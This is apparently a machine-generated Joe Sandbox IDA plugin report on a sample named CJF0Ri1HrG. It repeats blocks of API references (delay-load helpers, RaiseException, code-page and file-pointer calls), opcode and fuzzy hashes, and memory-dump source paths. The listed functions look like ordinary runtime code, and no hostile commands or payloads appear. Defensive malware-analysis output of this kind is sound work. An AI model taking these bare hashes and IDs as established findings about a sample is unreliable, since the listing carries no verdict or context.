                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 22bd651eca46618d5b2dab4008c7070a274bedc8ae505ac4162cb80fa9eca2ae
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: d1573c258c6e8a3211ab3f316682c53a825e457a530707c94f37502a6d6ec4bd
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 76576aa31aab6f68b3c586500a43762c6f59c556c3e9fdc4953eb1f572d7d3da
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 04d0381f43f7e33322dea378b08547f1b8f7f18862ceab17961ff59fd543e32e
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 4915e8eed571b7775cd2567c810973427265c4577e8a6ae4b324cf556917feb5
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: d7a4a31f9cf13a09d668994b5c1ff86ccb3453c43edfe2be29a5ea331c25d44d
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: 7
                                                                                        • API String ID: 1269201914-626684421
                                                                                        • Opcode ID: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
                                                                                        • Instruction ID: 9adc21543313d86a964535e6314b2fb138c81ad163467265d43af4cf1b6f98af
                                                                                        • Opcode Fuzzy Hash: 2998f0dcb728a8608b01df7f6bb7cd986e4c8a9039b950dff472fc96872b9b78
                                                                                        • Instruction Fuzzy Hash: 26A012D1168001BC311691425C03C37010CC0C9F10330C46DF82AC4480584428000431
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        • Opcode ID: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
                                                                                        • Instruction ID: bfe368a8bb96d25d90e7fdc83991dcc795105360216e6ecf41d5710a814f4f1c
                                                                                        • Opcode Fuzzy Hash: baabbf9866b22ad5f734647bc8d4d2b6ce4e30dac901495b4444682bf1774e6b
                                                                                        • Instruction Fuzzy Hash: 81A011C22A80003C322A22A02C02C3B022CC0CAF22330E2AEF82888880A88808002832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
                                                                                        • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                        • Opcode Fuzzy Hash: d9975607682afbe1b7a58b3cb9c54b5a0a7126ed5fdff5a79a3871d5197dc863
                                                                                        • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
                                                                                        • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                        • Opcode Fuzzy Hash: 571c725a5bcee770ffaf5f743163c1f3d243b04431804789a215354d77650e5f
                                                                                        • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        • Opcode ID: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
                                                                                        • Instruction ID: ecaabe679715f73942fb277e498379dd2febd26736637ee83140ec754053ba99
                                                                                        • Opcode Fuzzy Hash: ba6b89382cce1a9ecacd00a92e91135d67e0a0797bece91ee3bc4fcf4f330465
                                                                                        • Instruction Fuzzy Hash: 70A011CA2A8002BC322A22002E02C3B022CC0CAF20330E8AEF82A88880A8880C000832
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E51F
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: PDu<7
                                                                                        • API String ID: 1269201914-3110419215
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E580
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: Fjun7
                                                                                        • API String ID: 1269201914-1894352427
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 0038B7BB: GetOEMCP.KERNEL32(00000000,?,?,0038BA44,?), ref: 0038B7E6
                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0038BA89,?,00000000), ref: 0038BC64
                                                                                        • GetCPInfo.KERNEL32(00000000,0038BA89,?,?,?,0038BA89,?,00000000), ref: 0038BC77
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CodeInfoPageValid
                                                                                        • String ID:
                                                                                        • API String ID: 546120528-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00369A50,?,?,00000000,?,?,00368CBC,?), ref: 00369BAB
                                                                                        • GetLastError.KERNEL32(?,00000000,00368411,-00009570,00000000,000007F3), ref: 00369BB6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastPointer
                                                                                        • String ID:
                                                                                        • API String ID: 2976181284-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00361E55
                                                                                          • Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF
                                                                                        • _wcslen.LIBCMT ref: 00361EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2838827086-0
                                                                                        Uniqueness

